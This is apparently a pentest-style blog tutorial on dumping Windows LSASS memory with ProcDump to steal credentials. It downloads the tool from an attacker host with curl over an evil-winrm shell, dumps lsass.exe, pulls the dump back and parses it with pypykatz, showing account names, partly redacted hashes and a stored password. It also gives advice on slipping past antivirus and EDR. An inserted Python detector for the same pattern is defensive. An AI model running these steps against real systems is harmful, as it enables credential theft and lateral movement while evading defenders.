This article is for educational purposes only! I do not encourage you to run this on a machine you do not have permission to test. Performing these actions without permission can lead to prosecution in court. I am not responsible for your actions!
In this short article, I will guide you through the steps you can perform to dump the LSASS process on a machine running Microsoft Windows. Without further ado, let's jump into it.
If you are working on a CTF or you are assigned to perform a pentest on a machine, you may find yourself in a situation where you have to dump the LSASS process. You can use the well-known tool Mimikatz for this purpose. Mimikatz has only one big problem: it is recognized by 57 / 70 antivirus products on VirusTotal, so using Mimikatz is not a wise choice in most environments. There is a high chance that the antivirus will notice you, and so you will reveal to the blue teamers that you are in the network.
Even when you use ProcDump you have to watch out. Some companies have deployed an EDR (Endpoint Detection and Response) solution on their systems, and most EDR solutions will generate a Medium alert when ProcDump is used to dump a process, especially when the LSASS process is involved.
ProcDump is part of the Windows Sysinternals suite. The main purpose of this command-line utility is to troubleshoot CPU spikes and generate crash dumps during a spike, so that an administrator or developer can determine the cause of the spike. But it can also generate a dump of an arbitrary process, and that last capability is the one that is useful in our scenario.
In this example, I have broken into a system and I want to dump LSASS. I already have a shell on the machine through Windows Remote Management (WinRM) with evil-winrm.
On the victim machine, we download procdump.exe into the C:\temp directory. I have hosted an HTTP server on my attacker machine to serve the binary.

*Evil-WinRM* PS C:\temp> curl 10.10.14.13/procdump.exe -o procdump.exe
Now we can dump the LSASS process with ProcDump:

*Evil-WinRM* PS C:\temp> .\procdump.exe -accepteula -ma lsass.exe lsass.dmp

ProcDump v10.0 - Sysinternals process dump utility
Copyright (C) 2009-2020 Mark Russinovich and Andrew Richards
Sysinternals - www.sysinternals.com

[03:22:03] Dump 1 initiated: C:\temp\lsass.dmp
[03:22:03] Dump 1 writing: Estimated dump file size is 53 MB.
[03:22:04] Dump 1 complete: 53 MB written in 0.8 seconds
[03:22:04] Dump count reached.
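From the defender's side, the ProcDump run above is exactly the pattern EDRs alert on: a user-launched process opening lsass.exe with memory-read access. As an added example (not code from the original article), here is a small Python checker that runs over constructed Sysmon-style events (Event ID 1 process creation, Event ID 10 process access) and raises a finding when a non-allowlisted process opens lsass.exe with PROCESS_VM_READ, or when a command line names lsass as a dump target; the allowlist, field names and sample events are assumptions for illustration.

```python
"""Flag the ProcDump-against-LSASS pattern in Sysmon-style telemetry (constructed example)."""
import json

PROCESS_VM_READ = 0x0010  # access right required to read another process's memory
# Assumption: Windows components that legitimately open lsass.exe; tune per environment.
KNOWN_LSASS_READERS = {
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
    r"c:\windows\system32\services.exe",
}

# Constructed Sysmon-style events as JSON lines (EventID 1 = process create, 10 = process access).
SAMPLE_LOG = r"""
{"EventID":1,"Image":"C:\\temp\\procdump.exe","CommandLine":"procdump.exe -accepteula -ma lsass.exe lsass.dmp","ParentImage":"C:\\Windows\\System32\\wsmprovhost.exe"}
{"EventID":10,"SourceImage":"C:\\temp\\procdump.exe","TargetImage":"C:\\Windows\\System32\\lsass.exe","GrantedAccess":"0x1FFFFF"}
{"EventID":10,"SourceImage":"C:\\Windows\\System32\\csrss.exe","TargetImage":"C:\\Windows\\System32\\lsass.exe","GrantedAccess":"0x1400"}
{"EventID":1,"Image":"C:\\Windows\\System32\\notepad.exe","CommandLine":"notepad.exe notes.txt","ParentImage":"C:\\Windows\\explorer.exe"}
"""


def is_lsass(path):
    return path.lower().endswith(r"\lsass.exe")


def check_event(ev):
    """Return a finding string for a suspicious event, or None."""
    if ev.get("EventID") == 1:
        cmd = ev.get("CommandLine", "").lower()
        # A dump utility naming lsass on its command line, as in the walkthrough above.
        if "lsass" in cmd and ("procdump" in cmd or "-ma " in cmd or ".dmp" in cmd):
            return f"LSASS dump command line: {ev['CommandLine']} (parent {ev.get('ParentImage')})"
    elif ev.get("EventID") == 10 and is_lsass(ev.get("TargetImage", "")):
        granted = int(ev.get("GrantedAccess", "0x0"), 16)
        src = ev.get("SourceImage", "")
        # Memory-read access to LSASS from an unexpected process is what EDRs flag.
        if granted & PROCESS_VM_READ and src.lower() not in KNOWN_LSASS_READERS:
            return f"LSASS memory read by {src} (GrantedAccess {ev['GrantedAccess']})"
    return None


def scan_log(text):
    """Parse JSON lines and return the list of findings (two for SAMPLE_LOG)."""
    findings = []
    for line in text.splitlines():
        if line.strip():
            hit = check_event(json.loads(line))
            if hit:
                findings.append(hit)
    return findings


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print("ALERT:", finding)
```

The csrss.exe event is suppressed both because it is allowlisted and because 0x1400 does not include PROCESS_VM_READ; in production you would also want the CallTrace field to catch tools that impersonate known binaries.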
OK, we now have the lsass.dmp file, which contains juicy information. We need to transfer this file to our attacker machine to analyze its contents.

*Evil-WinRM* PS C:\temp> download lsass.dmp
Info: Downloading C:\temp\lsass.dmp to lsass.dmp
Info: Download successful!
To analyze the contents we use Pypykatz, a Python implementation of Mimikatz. If you do not have pypykatz installed, you can get it by cloning the repository with the command below.

┌──(root💀kali)-[/home/kali/hacking]
└─# git clone https://github.com/skelsec/pypykatz.git
Cloning into 'pypykatz'…
remote: Enumerating objects: 2482, done.
remote: Counting objects: 100% (852/852), done.
remote: Compressing objects: 100% (348/348), done.
remote: Total 2482 (delta 539), reused 754 (delta 501), pack-reused 1630
Receiving objects: 100% (2482/2482), 903.21 KiB | 4.38 MiB/s, done.
Resolving deltas: 100% (1504/1504), done.
Now run Pypykatz, calling its lsa minidump command on the dump file.

┌──(root💀kali)-[/home/kali/hacking]
└─# pypykatz lsa minidump lsass.dmp
INFO:root:Parsing file lsass.dmp
FILE: ======== lsass.dmp =======
== LogonSession ==
authentication_id 3146260 (300214)
session_id 0
username Administrator
domainname FUTURE
logon_server FUTURE
logon_time 2021-06-19T10:21:54.261897+00:00
sid S-1-5-21-1199094703-3580107816-3092147818-500
luid 3146260
== LogonSession ==
authentication_id 2849314 (2b7a22)
session_id 0
username Administrator
domainname FUTURE
logon_server FUTURE
logon_time 2021-06-19T10:12:08.766735+00:00
sid S-1-5-21-1199094703-3580107816-3092147818-500
luid 2849314
== LogonSession ==
authentication_id 347219 (54c53)
session_id 1
username rodny
domainname FUTURE
logon_server FUTURE
logon_time 2021-06-19T09:32:07.942538+00:00
sid S-1-5-21-1199094703-3580107816-3092147818-1002
luid 347219
== MSV ==
Username: rodny
Domain: FUTURE
LM: NA
NT: 499ae<REDACTED>742ffe
SHA1: b7c4ec<REDACTED>d18141113cc78
== WDIGEST [54c53]==
username rodny
domainname FUTURE
password None
== Kerberos ==
Username: rodny
Domain: FUTURE
Password: None
== WDIGEST [54c53]==
username rodny
domainname FUTURE
password None
== CREDMAN [54c53]==
luid 347219
username FUTURE\rodny
domain FUTURE\rodny
password [email protected]@
...
You have now extracted the contents of the lsass.dmp file, which can contain plaintext passwords. You can also try to crack the LM hash and NT hash with hashcat.
Happy hacking! 🙂